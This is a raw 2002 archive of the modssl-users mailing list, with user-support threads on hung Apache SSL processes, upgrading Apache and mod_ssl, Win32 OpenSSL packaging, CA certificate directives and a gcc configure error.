would hate to switch to stronghold :(

Thanks,
- Alex


On Mon, 24 Jun 2002, Andy Osborne wrote:

  

  

    
I've seen this happen sometimes on our SSL servers (which do
quite a lot of traffic).  A quick search of the logs for
recent connections from the same address always shows the
client as IE5.0 - which is known to be broken.  The connections
seem to stall in the SSL negotiation and get killed off
but our rather intolerant tcp keepalive settings.  I've never
found a real answer to the problem.

Andy

Alex Kotov wrote:

    

    

      
Hi Cliff,

Thanks for your response.

I'm using

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

and 5 is definitely the file descriptor for the network connection.

Is there anything else I should check?

Thanks,
- Alex


On Mon, 24 Jun 2002, Cliff Woolley wrote:


      

      

        
On Sun, 23 Jun 2002, Alex Kotov wrote:


        

        

          
After a while the server processes become stuck while waiting for
the data from a socket.
Running strace on a hung process produces
read(5,
for a long time, eventually followed by
read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)

          

        

        
Are you sure that file descriptor 5 is the connection to the client?

What SSLRandomSeed are you using?  This sounds like one of those
/dev/random not-enough-entropy problems to me.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


        

      

      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


      

    

    
--
Andy Osborne      ****************      "Vertical B2B Communities"
Senior Internet Engineer
Sift Group                    100 Victoria Street, Bristol BS1 6HZ
tel:+44 117 915 9600  fax:+44 117 915 9630   http://www.sift.co.uk

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

    

  

  

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
  








--------------000004010906080203070307--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 21:44:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23806; Mon, 24 Jun 2002 21:41:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA23617; Mon, 24 Jun 2002 21:38:39 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5F4314CE7A7; Mon, 24 Jun 2002 21:38:34 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8813A286B8; Mon, 24 Jun 2002 19:33:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id RAA06129; Mon, 24 Jun 2002 17:50:30 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g5OFoQG11812647
	for modssl-users@modssl.org; Mon, 24 Jun 2002 17:50:26 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0p0l6; Mon Jun 24 17:50:20 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id RAA04574
	for ; Mon, 24 Jun 2002 17:49:20 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id RAA58879
	for modssl-users@modssl.org; Mon, 24 Jun 2002 17:50:10 +0200 (METDST)
Date: Mon, 24 Jun 2002 17:50:10 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: Upgrade ?
Message-ID: <20020624175010.A2112368@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from jwoolley@apache.org on Mon, Jun 24, 2002 at 11:32:06AM -0400
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Mon, Jun 24, 2002 at 11:32:06AM -0400, Cliff Woolley wrote:
> Then when you run 'make install' from the Apache 1.3.26 source
> directory, it will overwrite your 1.3.23 installation.

Just in case anyone wonders: it will NOT overwrite the config
files of the 1.3.23 installation.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 22:05:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25848; Mon, 24 Jun 2002 22:02:00 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA25598; Mon, 24 Jun 2002 21:59:47 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5OJtZC04118
	for ; Mon, 24 Jun 2002 15:55:35 -0400
Date: Mon, 24 Jun 2002 15:55:35 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Upgrade ?
In-Reply-To: <20020624175010.A2112368@ohm.arago.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 24 Jun 2002, Thomas Binder wrote:

> > Then when you run 'make install' from the Apache 1.3.26 source
> > directory, it will overwrite your 1.3.23 installation.
>
> Just in case anyone wonders: it will NOT overwrite the config
> files of the 1.3.23 installation.

Oh right... meant to point that out.  Thanks.  :)

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 22:05:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25681; Mon, 24 Jun 2002 22:00:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from goose.mail.pas.earthlink.net id VAA25466; Mon, 24 Jun 2002 21:58:17 +0200 (MET DST)
Received: from bigbird.mail.pas.earthlink.net ([207.217.120.244] helo=bigbird.psp.pas.earthlink.net)
	by goose.mail.pas.earthlink.net with esmtp (Exim 3.33 #2)
	id 17MZrb-00058P-00
	for modssl-users@modssl.org; Mon, 24 Jun 2002 12:51:03 -0700
Received: (from nobody@localhost)
	by bigbird.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g5OJgF505980
	for modssl-users@modssl.org; Mon, 24 Jun 2002 12:42:15 -0700 (PDT)
Date: Mon, 24 Jun 2002 12:42:15 -0700
From: RON MCKEEVER
To: modssl-users@modssl.org
Subject: Re: Upgrade ?
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: RON MCKEEVER
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Mr Woolley,

Thanks, for the email. That REALLY helped me to get my mod_ssl-2.8.7-1.3.23
upgraded to mod_ssl-2.8.10-1.3.26. 
aca# pwd
opt/apache/bin
aca# ./apachectl startssl
Apache/1.3.26 mod_ssl/2.8.10 (Pass Phrase Dialog)


I was wondering is there a web page at apache/or modssl site that explains the
upgrade process?  

This ? might not be for you or this group but I guess I'll ask anyway. 

When I use my phpinfo page, to see config info it shows that apache is :
Apache Version    Apache/1.3.23 

but If I look a little further down on the phpinfo page I see the correct
info:

["SERVER_SIGNATURE"] 
Apache/1.3.26 Server at aca.fff.com Port
443
 
["SERVER_SOFTWARE"] Apache/1.3.26 (Unix) PHP/4.1.2 mod_ssl/2.8.10
OpenSSL/0.9.6 mod_perl/1.26  

I have rebooted my system and still that one line in php shows the wrong
version? Any Ideas? 

Thanks Again,
Ron


On Mon, 24 Jun 2002 11:32:06 -0400 (EDT) Cliff Woolley 
wrote:

On Mon, 24 Jun 2002, RON MCKEEVER wrote:

> Im a little confused on how to upgrade my current mod_ssl-2.8.7-1.3.23, to
> mod_ssl-2.8.10-1.3.26.
> When I untar the new apache1.3.26 it is in it own dir.. So how do I upgrade
> 1.3.23? When I run the configure statement in the mod_ssl-2.8.10 dir I cant
> state --with-apache="1.3.23", I need to state the new apache dir, right??

Right... you give mod_ssl-2.8.10 the Apache 1.3.26 *source* directory for
its --with-apache= argument.  Then when you configure apache, tell it to
*install* to the same location that 1.3.23 is currently installed using
--prefix= (eg /usr/local/apache) and use the same directory structure
(using --with-layout= ) that you used before, if any.  Then when you run
'make install' from the Apache 1.3.26 source directory, it will overwrite
your 1.3.23 installation.

That should be it.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 09:39:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18794; Tue, 25 Jun 2002 09:38:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id JAA18752; Tue, 25 Jun 2002 09:37:30 +0200 (MET DST)
Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g5P7bPI28017
	for ; Tue, 25 Jun 2002 09:37:25 +0200
Received: from pdbrd02e.pdb.fsc.net (pdbrd02e.pdb.fsc.net [172.25.96.15])
	by trulli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g5P7bON05911
	for ; Tue, 25 Jun 2002 09:37:24 +0200
Received: by pdbrd02e.pdb.fsc.net with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 09:37:24 +0200
Message-ID: <2FE7462E4A80004AA0790EFDB5A526925BE797@mchrd22e.mch.fsc.net>
From: "Boehme, Alfred" 
To: "'modssl-users@modssl.org'" 
Subject: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no openssl
	 directory ?
Date: Tue, 25 Jun 2002 09:37:14 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boehme, Alfred" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

is there any reason, why there is no openssl directory anymore in this contribution ?

I could not find any contribution containing OpenSSL_0.9.6d with an openssl directory
containing the sub directories bin, include and lib.

Is this directory not needed anymore ?

Thanks in advance

Alfred
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 12:14:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA28197; Tue, 25 Jun 2002 12:14:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id MAA28141; Tue, 25 Jun 2002 12:12:35 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=lttit)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17MmRR-0000as-00; Tue, 25 Jun 2002 11:16:53 +0200
Date: Tue, 25 Jun 2002 11:16:53 +0200
From: Tim Tassonis 
To: "Boehme, Alfred" 
Cc: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no openssl
In-Reply-To: <2FE7462E4A80004AA0790EFDB5A526925BE798@mchrd22e.mch.fsc.net>
References: <2FE7462E4A80004AA0790EFDB5A526925BE798@mchrd22e.mch.fsc.net>
X-Mailer: Sylpheed version 0.7.7 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Alfred


On Tue, 25 Jun 2002 09:44:29 +0200
"Boehme, Alfred"  wrote:

> Hi Tim,
> 
> am I right, that the contribution
> 	Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip
> was generated by you ?

No, it wasn't. I compiled apache 1.3.26 with mod_ssl 2.8.10 and openssl
0.9.6c for Windows, but when I wanted to package it for upload, I saw
there already is a new version in the contrib section.


If anyone is interested, I can still upload my version.

Bye
Tim

> 
> If no, please excuse me.
> 
> If yes, why is there no openssl directory anymore ?
> 
> Thanks in advance
> 
> Alfred
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 13:04:43 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA02209; Tue, 25 Jun 2002 13:03:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA02157; Tue, 25 Jun 2002 13:02:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 224C94CE783; Tue, 25 Jun 2002 13:02:21 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0F68528B0F; Tue, 25 Jun 2002 13:02:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bouba.alxhost.com id LAA25776; Tue, 25 Jun 2002 11:29:04 +0200 (MET DST)
Received: from [212.162.175.101] (helo=lusidor2002.lusidor.com)
	by bouba.alxhost.com with esmtp (Exim 3.35 #1)
	id 17Mmd7-0006qP-00
	for modssl-users@modssl.org; Tue, 25 Jun 2002 05:28:58 -0400
Message-Id: <5.1.0.14.0.20020625112230.027ccb40@mail.lusidor.nu>
X-Sender: lusidor@mail.lusidor.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 25 Jun 2002 11:29:01 +0200
To: modssl-users@modssl.org
From: Jimmy Lantz 
Subject: To use both SSLCACertificatePath and SSLCACertificateFile or
  either one.
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - bouba.alxhost.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [0 0]
X-AntiAbuse: Sender Address Domain - lusidor.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jimmy Lantz 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi
I' read a post about  Client Certificates=

"You really shouldn't mix SSLCACertificatePath and SSLCACertificateFile one 
of them should be enough. I'm assuming that you also have stuff like 
SSLEngine on and SSLVerifyClient require in the right places in your 
config. vh Mads Toftum "

But the docs states
This can be used alternatively and/or additionally to SSLCACertificatePath.

Which is to be prefered?
My path is all set up but should I add the file as well?
What are the Pros / Cons for doing either thing?

TIA
Jim.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 13:17:54 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA03445; Tue, 25 Jun 2002 13:16:59 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vega.fmf.uni-lj.si id NAA03301; Tue, 25 Jun 2002 13:15:12 +0200 (MET DST)
Received: (qmail 23105 invoked by uid 0); 25 Jun 2002 11:05:49 -0000
Received: from kristijan@rip-computer.si by vega.fmf.uni-lj.si
	 by uid 100 with qmail-scanner-1.10 (sweep: 2.9/3.54. . Clear:0. Processed in 0.609694 secs); 25 Jun 2002 11:05:49 -0000
X-Virus-Scan: by vega.fmf.uni-lj.si (sweep: 2.9/3.54. )
Received: from vs3.fmf.uni-lj.si (HELO 127.0.0.1) (193.2.110.18)
  by 0 with SMTP; 25 Jun 2002 11:05:48 -0000
Date: Tue, 25 Jun 2002 13:13:31 +0200
From: Kristijan Cafuta RIP 
X-Mailer: The Bat! (v1.60m) Personal
X-Priority: 3 (Normal)
Message-ID: <8385926816.20020625131331@rip-computer.si>
To: "Boehme, Alfred" 
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no openssl  directory ?
In-Reply-To: <2FE7462E4A80004AA0790EFDB5A526925BE797@mchrd22e.mch.fsc.net>
References: <2FE7462E4A80004AA0790EFDB5A526925BE797@mchrd22e.mch.fsc.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kristijan Cafuta RIP 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you look further in contribution directory, you'll find OpenSSL
0.9.6d separately... use this one and same instructions as always and
it will (probably) work...


BA> Hello,

BA> is there any reason, why there is no openssl directory anymore in this contribution ?

BA> I could not find any contribution containing OpenSSL_0.9.6d with an openssl directory
BA> containing the sub directories bin, include and lib.

BA> Is this directory not needed anymore ?

BA> Thanks in advance

BA> Alfred
BA> ______________________________________________________________________
BA> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
BA> User Support Mailing List                      modssl-users@modssl.org
BA> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 15:46:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA15029; Tue, 25 Jun 2002 15:45:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id PAA14980; Tue, 25 Jun 2002 15:45:06 +0200 (MET DST)
Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g5PDixI26023
	for ; Tue, 25 Jun 2002 15:45:00 +0200
Received: from pdbrd02e.pdb.fsc.net (pdbrd02e.pdb.fsc.net [172.25.96.15])
	by trulli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g5PDixN03007
	for ; Tue, 25 Jun 2002 15:44:59 +0200
Received: by pdbrd02e.pdb.fsc.net with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 15:45:00 +0200
Message-ID: <2FE7462E4A80004AA0790EFDB5A526925BE7A8@mchrd22e.mch.fsc.net>
From: "Boehme, Alfred" 
To: "'modssl-users@modssl.org'" 
Subject: AW: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no ope
	nssl  directory ?
Date: Tue, 25 Jun 2002 15:44:44 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA14984
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boehme, Alfred" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

thank you for this information.
But there is no directory structure in this OpenSSL zip file.
Can I assume, that the structure is exactly the same as before ?

Alfred

> -----Ursprüngliche Nachricht-----
> Von: Kristijan Cafuta RIP [mailto:kristijan@rip-computer.si]
> Gesendet: Dienstag, 25. Juni 2002 13:14
> An: Boehme, Alfred
> Betreff: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no
> openssl directory ?
> 
> 
> If you look further in contribution directory, you'll find OpenSSL
> 0.9.6d separately... use this one and same instructions as always and
> it will (probably) work...
> 
> 
> BA> Hello,
> 
> BA> is there any reason, why there is no openssl directory 
> anymore in this contribution ?
> 
> BA> I could not find any contribution containing 
> OpenSSL_0.9.6d with an openssl directory
> BA> containing the sub directories bin, include and lib.
> 
> BA> Is this directory not needed anymore ?
> 
> BA> Thanks in advance
> 
> BA> Alfred
> BA> 
> ______________________________________________________________________
> BA> Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> BA> User Support Mailing List                      
> modssl-users@modssl.org
> BA> Automated List Manager                            
> majordomo@modssl.org
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 16:56:00 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20084; Tue, 25 Jun 2002 16:55:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vega.fmf.uni-lj.si id QAA19964; Tue, 25 Jun 2002 16:53:20 +0200 (MET DST)
Received: (qmail 25673 invoked by uid 0); 25 Jun 2002 14:43:56 -0000
Received: from kristijan@rip-computer.si by vega.fmf.uni-lj.si
	 by uid 100 with qmail-scanner-1.10 (sweep: 2.9/3.54. . Clear:0. Processed in 0.717495 secs); 25 Jun 2002 14:43:56 -0000
X-Virus-Scan: by vega.fmf.uni-lj.si (sweep: 2.9/3.54. )
Received: from vs1.fmf.uni-lj.si (HELO 127.0.0.1) (193.2.110.23)
  by 0 with SMTP; 25 Jun 2002 14:43:55 -0000
Date: Tue, 25 Jun 2002 16:53:10 +0200
From: Kristijan Cafuta RIP 
X-Mailer: The Bat! (v1.60m) Personal
X-Priority: 3 (Normal)
Message-ID: <151532555684.20020625165310@rip-computer.si>
To: "Boehme, Alfred" 
Subject: Re: AW: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no ope nssl  directory ?
In-Reply-To: <2FE7462E4A80004AA0790EFDB5A526925BE7A8@mchrd22e.mch.fsc.net>
References: <2FE7462E4A80004AA0790EFDB5A526925BE7A8@mchrd22e.mch.fsc.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kristijan Cafuta RIP 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think that directory structure actually doesn't matter... you just put
all files in openssl directory and don't forget to copy those two dlls
to system32 directory


BA> Hi,

BA> thank you for this information.
BA> But there is no directory structure in this OpenSSL zip file.
BA> Can I assume, that the structure is exactly the same as before ?

BA> Alfred

>> -----Ursprüngliche Nachricht-----
>> Von: Kristijan Cafuta RIP [mailto:kristijan@rip-computer.si]
>> Gesendet: Dienstag, 25. Juni 2002 13:14
>> An: Boehme, Alfred
>> Betreff: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip: no
>> openssl directory ?
>> 
>> 
>> If you look further in contribution directory, you'll find OpenSSL
>> 0.9.6d separately... use this one and same instructions as always and
>> it will (probably) work...
>> 
>> 
>> BA> Hello,
>> 
>> BA> is there any reason, why there is no openssl directory 
>> anymore in this contribution ?
>> 
>> BA> I could not find any contribution containing 
>> OpenSSL_0.9.6d with an openssl directory
>> BA> containing the sub directories bin, include and lib.
>> 
>> BA> Is this directory not needed anymore ?
>> 
>> BA> Thanks in advance
>> 
>> BA> Alfred
>> BA> 
>> ______________________________________________________________________
>> BA> Apache Interface to OpenSSL (mod_ssl)                   
>> www.modssl.org
>> BA> User Support Mailing List                      
>> modssl-users@modssl.org
>> BA> Automated List Manager                            
>> majordomo@modssl.org
>> 
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> 
BA> ______________________________________________________________________
BA> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
BA> User Support Mailing List                      modssl-users@modssl.org
BA> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 17:09:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA21031; Tue, 25 Jun 2002 17:08:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from qmailserver.consors.es id RAA20983; Tue, 25 Jun 2002 17:07:58 +0200 (MET DST)
Received: (qmail 21283 invoked by uid 508); 25 Jun 2002 14:58:14 -0000
Received: from unknown (HELO wesami0029) (192.168.38.6)
  by 62.22.163.135 with SMTP; 25 Jun 2002 14:58:14 -0000
Message-ID: <01e901c21c59$27a83f80$0626a8c0@consors.es>
From: "Webmaster" 
To: 
References: <010501c21b5d$9c6cce00$0626a8c0@consors.es>
Subject: RE: C compiler cannot create executables
Date: Tue, 25 Jun 2002 17:01:16 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01E6_01C21C69.EB201F90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Webmaster" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01E6_01C21C69.EB201F90
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

OK, I have found the error, I had two different versions of GCC and I =
was using the wrong one due to PATH variable setting...
Forget this question
  ----- Original Message -----=20
  From: Webmaster=20
  To: modssl-users@modssl.org=20
  Sent: Monday, June 24, 2002 11:00 AM
  Subject: C compiler cannot create executables


  Hi everybody.

      Hans

      I have a problem with mod_ssl 2.8.9 for Apache 1.3.26. When I try =
to configure
  this module for compilation (# configure =
--with-apache=3D/var/tmp/apache_1.3.26 ) it gives the following error:

  Configuring mod_ssl/2.8.9 for Apache/1.3.26
   + Apache location: /var/tmp/apache_1.3.26 (Version 1.3.26)
   + Auxiliary patch tool: ./etc/patch/patch (local)
  ./configure:Error: Building of 'patch' tool failed:
  -------------------------------------------------
  x patch/rename.c, 1323 bytes, 3 tape blocks
  x patch/util.c, 9365 bytes, 19 tape blocks
  x patch/util.h, 2325 bytes, 5 tape blocks
  x patch/version.c, 280 bytes, 1 tape blocks
  x patch/version.h, 25 bytes, 1 tape blocks
  loading cache ./config.cache
  checking for gcc... gcc
  checking whether the C compiler (gcc  ) works... no
  configure: error: installation or configuration problem: C compiler =
cannot
  create executables.
  make: *** No targets.  Stop.
  -------------------------------------------------
  Hint: Either try to build 'patch' under etc/patch/
  Hint: manually and re-run this 'configure' script
  Hint: or provide us the path to your vendor 'patch'
  Hint: program via the --with-patch=3DFILE option (but
  Hint: expect perhaps failures when applying patches!)


  My OS is Solaris 8 and I have tested it with two versions of gcc : =
9.95.2 and 3.1
  I had no problems with the installation of apache 1.3.20 and mod_ssl =
2.8.4

  Did anybody experienced this problem and have found a solution?

  Thanks in advance.

  Oscar.

------=_NextPart_000_01E6_01C21C69.EB201F90
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









OK, I have found the error, I had two different =
versions=20
of GCC and I was using the wrong one due to PATH variable=20
setting...


Forget this question


  
----- Original Message ----- 

  From:=20
  Webmaster=20
  
  
To: modssl-users@modssl.org 

  
Sent: Monday, June 24, 2002 =
11:00=20
AM

  
Subject: C compiler cannot =
create=20
  executables

  


  
Hi everybody.

  
 

  
    =
Hans

    I have=20
  a problem with mod_ssl 2.8.9 for Apache 1.3.26. When I try to=20
  configure
this module for compilation (# configure=20
  --with-apache=3D/var/tmp/apache_1.3.26 ) it gives the following=20
  error:

Configuring mod_ssl/2.8.9 for Apache/1.3.26
 + =
Apache=20
